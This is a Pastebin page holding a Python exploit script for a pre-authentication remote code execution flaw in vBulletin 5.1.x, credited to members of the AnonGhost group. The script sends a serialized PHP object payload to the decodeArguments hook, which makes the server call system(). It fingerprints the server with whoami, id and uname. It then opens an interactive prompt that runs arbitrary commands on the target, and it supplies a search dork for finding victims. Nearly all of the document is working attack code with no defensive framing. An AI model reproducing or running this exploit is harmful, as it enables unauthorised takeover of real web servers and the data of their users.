Mauritania_Attacker

vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit

Nov 12th, 2015
15,886
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Exploit Title: vBulletin 5.1.x - PreAuth Remote Code Execution
  2. #Date: 11-10-2015
  3. #Dork:Powered by: vBulletin, Version 5.1 or make your own ^^
  4. #Requirements: Python 3.4.x or higher, install Requests and parse Module.
  5. #Description: Not the authors of this exploit we just fixed the exploit and coded this script (Mauritania Attacker & Th3Falcon)
  6.  
  7. import  requests, re, sys
  8. import  parse as   urlparse  #BUG Python Module Parse Fixed By Mauritania Attacker (urllib.parse does not work properly)
  9.  
  10. def banner():
  11.     print( '\n' )
  12.     print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
  13.     print( '               VBulletin 5.1.x RCE auto Exploiter Priv8             ' )
  14.     print( '                 GreetZ To All AnonGhost Members                    ' )
  15.     print( '                 Coded by Mauritania Attacker & Th3Falcon           ' )
  16.     print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
  17.     print( '\n' )
  18.  
  19. def inject( ghost ):
  20.     url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
  21.     try:
  22.         r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:14:"echo Th3Falcon";}', timeout= 50 )
  23.         if 'Th3Falcon' in r.text and len( r.text ) < 50:
  24.             try:
  25.                 r   = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:49:"whoami;echo :::;id;echo :::;uname -a;echo :::;pwd";}', timeout= 50 )
  26.                 print( '     [+] GROUP   :  ' + r.text.split( ':::' )[0].strip() )
  27.                 print( '     [+] USER    :  ' + r.text.split( ':::' )[1].strip() )
  28.                 print( '     [+] KERNEL  :  ' + r.text.split( ':::' )[2].strip() )
  29.                 print( '     [+] DIR     :  ' + r.text.split( ':::' )[3].strip() )
  30.                 sys.stdout.flush()
  31.                 return r.text.split( ':::' )[3].strip();
  32.             except:
  33.                 return ''
  34.         else:
  35.             return ''
  36.     except:
  37.         print('     [+] Problem while exploiting..')
  38.         return ''
  39.  
  40. def bash(ghost, command):
  41.     url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
  42.     r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:' + str(len(command)) + ':"' + command + '";}', timeout= 50 )
  43.     print(r.text)
  44.  
  45. def main():
  46.     banner()
  47.     site = ''
  48.     while site != 'exit':
  49.         site = input('Target : ')
  50.         if site == 'exit':
  51.             break
  52.         mad = inject(site)
  53.         if mad != '' :
  54.            
  55.             print('     [+] @Connection Successfully established... \n')
  56.             userinput = ''
  57.             while userinput != 'exit':
  58.                 userinput = input("AnonGhost@Target :")
  59.                 if userinput == 'exit':
  60.                     break
  61.                 bash(site, userinput)
  62.         else:
  63.             print('     [+] Website is not Vulnerable :(')
  64.  
  65. if __name__ == '__main__':
  66.     main()
  67.  
  68. #D0ne
  69. #./Mauritania Attacker
  70. #./Th3Falcon
  71. #GreetZ To All AnonGhost MemberZ
RAW Paste Data